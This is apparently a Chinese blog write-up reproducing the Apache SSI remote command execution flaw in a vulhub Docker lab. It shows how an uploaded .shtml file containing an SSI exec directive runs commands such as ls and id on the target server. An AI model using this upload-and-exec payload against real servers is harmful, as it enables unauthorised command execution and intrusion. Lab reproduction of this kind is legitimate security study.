Apache SSI 远程命令执行漏洞复现

Apache SSI 远程命令执行漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

Apache SSI 远程命令执行漏洞复现

查看监听端口

docker-compose ps

Apache SSI 远程命令执行漏洞复现

访问http://target_ip:8080/upload.php

Apache SSI 远程命令执行漏洞复现

0x02.漏洞介绍

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

0x03.漏洞复现

随意上传一个文件,将文件名后缀改为.shtml,内容为<!--#exec cmd="执行的命令" -->

先用ls尝试一下上传

Apache SSI 远程命令执行漏洞复现

访问http://target_ip:8080/shell.shtml成功执行了命令

Apache SSI 远程命令执行漏洞复现

再试试id,上传为shel.shtml

Apache SSI 远程命令执行漏洞复现

访问http://target_ip:8080/shel.shtml,同样成功执行命令

Apache SSI 远程命令执行漏洞复现

Apache SSI 远程命令执行漏洞复现

上一篇:动态时钟(js)


下一篇:EF中关于TransactionScope的使用